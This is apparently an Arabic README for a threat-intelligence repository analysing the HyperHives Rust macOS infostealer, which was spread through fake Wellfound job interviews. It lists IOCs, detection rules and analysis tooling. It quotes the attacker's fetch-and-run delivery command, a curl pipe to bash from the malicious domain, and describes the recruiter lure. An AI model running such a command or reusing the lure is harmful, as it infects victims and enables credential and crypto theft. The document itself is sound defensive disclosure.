
تحليل ثابت كامل لـ HyperHives أداة سرقة المعلومات Rust الخاصة بـ macOS — 571 قيمة تكوين مفكوكة، بنية تحتية لـ C2، إسناد إلى DPRK/Contagious Interview، قواعد YARA/Sigma، حزمة STIX 2.1، طبقة ATT&CK Navigator
معلومات التهديدات: برنامج استخراج معلومات (infostealer) ثنائي عالمي لنظام macOS مبني بلغة Rust، تم توصيله عبر مسار مقابلة عمل وهمي على Wellfound (المعروفة سابقًا بـ AngelList). قام شخصية المشغل "Felix" من "HyperHive" بإغراء الأهداف لتنفيذ مثبت ضار من
macos.hyperhives.net. يوثق هذا المستودع التحليل الثابت الكامل: تم استرداد 571 قيمة تكوين مشفرة، بما في ذلك عناوين C2 وSentry DSN و 276 معرفًا مستهدفًا من إضافات Chrome.
| SHA-256 العينة | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| نطاق C2 | cloudproxy.link |
| نطاق التوصيل | macos.hyperhives.net |
| منصة الإغراء | Wellfound (المعروفة سابقًا بـ AngelList) |
| شخصية المشغل | "Felix" في "HyperHive" |
| VirusTotal | 9 / 63 كشف |
| التصنيف | كشف عام / حزمة مؤشرات (IOC bundle) |
| آخر تحديث | أبريل 2026 |
| الملف | الصيغة | الغرض |
|---|---|---|
iocs.txt | نص عادي | التجزئات (Hashes)، النطاقات، عناوين URL، عناوين IP، البريد الإلكتروني، معرفات Sentry — لصقها في قوائم الحظر، MISP، OpenCTI |
yara_rules.yar | YARA 4.2+ | تطابق تجزئة العينة المعروفة + كشف السلاسل الاسترشادية لـ Mach-O |
sigma_rules.yml | Sigma | قواعد الوكيل (Proxy)، DNS، وإنشاء العمليات — اضبط logsource لنظام SIEM الخاص بك |
stix/bundle.json | STIX 2.1 | حزمة CTI قابلة للقراءة آليًا تحتوي على مؤشرات، SDO للبرامج الضارة، البنية التحتية، أنماط ATT&CK، والعلاقات |
attack-navigator-layer.json | ATT&CK Navigator | استيراد إلى مستعرض ATT&CK للحصول على تغطية تقنية مرئية |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## بدء سريع
ضع العينة كـ `sample/installer_binary` (راجع [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) للتحقق من التجزئة)، ثم:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
يقوم ملف compose بفرض network_mode: none و read_only: true، ويسقط جميع قدرات Linux. راجع SECURITY.md للإرشادات الكاملة حول التعامل.
أدى إعلان وظيفة على Wellfound (المعروفة سابقًا باسم AngelList) إلى سلسلة من رسائل البريد الإلكتروني للهندسة الاجتماعية من شخصية مشغل تدعى "Felix" في "HyperHive". بعد الإطراء على الخلفية التقنية للهدف وتحديد مقابلة وهمية، وجه المهاجم الضحية إلى "مراجعة المنتج" على hyperhives.net وتحديدًا فحص الإعدادات → التشخيص → السجل — كذريعة لتنفيذ:```
curl -s https://macos.hyperhives.net/install | nohup bash &
الحمولة هي **ثنائي عالمي Mach-O بحجم 8.5 ميغابايت** (x86_64 + arm64) مترجم بلغة Rust. التحليل الثابت باستخدام مختبر Docker معزول ومحاكاة CPU لـ **570 روتين مساعد فريد من نوع x86_64** كشف عن **جميع قيم التكوين المشفرة البالغ عددها 571**، مما أظهر:
- **C2:** `cloudproxy.link` — أربعة نقاط نهاية HTTPS
- **Sentry (إسناد التتبع):** DSN كامل مع معرفات المؤسسة/المشروع على `ingest.de.sentry.io`
- **هوية البناء:** مستخدم Cargo `rootr`، اسم الكود `force`، الإصدار `9.12.1`
- **الأهداف:** 276 معرف إضافات Chrome (محافظ العملات الرقمية، مديري كلمات المرور، بيانات اعتماد الشركات)
تتوافق التكتيكات مع حملات **مقابلة معدية المرتبطة بكوريا الشمالية (DPRK)** — مقابلات وظائف وهمية على منصات مشروعة، بناء ثقة متعدد الخطوات، تسليم عبر `curl | bash`، أداة سرقة لـ macOS بلغة Rust، واستخراج بيانات يركز على العملات الرقمية.
---
## 1 — كيف بدأ الأمر
### الطُعم: مقابلة وظيفة وهمية على Wellfound
بدأ الهجوم بـ **إعلان وظيفة شرعي المظهر على Wellfound** (المعروفة سابقًا باسم AngelList). بعد أن تقدم الهدف بطلب، جرت سلسلة البريد الإلكتروني التالية من مشغل يستخدم شخصية **"Felix"** واسم الشركة **"HyperHive"**:
**البريد الإلكتروني 1** (4 أبريل 2026) — الاتصال الأولي. أقر "Felix" بالسيرة الذاتية للهدف وملف LinkedIn الخاص به، وادعى أن "Tech Lead" الخاص بهم وافق على المضي قدمًا، وأشار تحديدًا إلى الخبرة الفنية الحقيقية للهدف. ذكر البريد الإلكتروني أن HyperHive "تبني نسخة سطح المكتب من Hyperhives عبر أنظمة تشغيل مختلفة" ودعا الهدف إلى جدولة مقابلة في UTC+0.